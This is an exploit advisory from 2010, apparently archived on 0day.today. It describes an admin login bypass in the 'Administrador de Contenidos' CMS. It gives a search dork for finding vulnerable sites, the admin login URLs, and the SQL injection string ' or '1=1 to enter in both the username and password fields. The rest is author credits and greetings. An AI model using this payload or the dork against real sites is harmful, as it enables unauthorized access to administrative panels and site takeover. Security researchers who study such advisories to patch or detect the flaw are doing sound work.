id: 12157
date: 05/07/2010
title: Administrador de Contenidos Admin Login Bypass vulnerability
author: ra3ch
cves: 

============================================================
Administrador de Contenidos Admin Login Bypass vulnerability
============================================================

************************************************************
 
**      Administrador de Contenidos  Admin Login Bypass vulnerability
 
************************************************************
 
**  Prodcut:        Administrador de Contenidos  
 
**  Home   :         www.DZ4All.cOm/Cc
 
**  Vunlerability :        Admin Bypass
 
**  Risk  :        High
 
**  Dork :         "Dise?o Web Hernest Consulting S.L."
 
************************************************************
 
** Discovred by:    Ra3cH
 
** From           :    Algeria
 
** Contact     :     e51@hotmail.fr
 
** *********************************************************
 
** Greetz to :     ALLAH
 
**         All Members of  http://www.DZ4All.cOm/Cc
 
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen
 
************************************************************
 
**  Exploit:
 
**  http://[PATH]/admin    or     http://[PATH]/admin/Login.Asp
 
**
 
**  user :         ' or '1=1     
 
**  password :     ' or '1=1  
 
** 
 
************************************************************
 
************************************************************ 



#  0day.today [2023-03-22]  #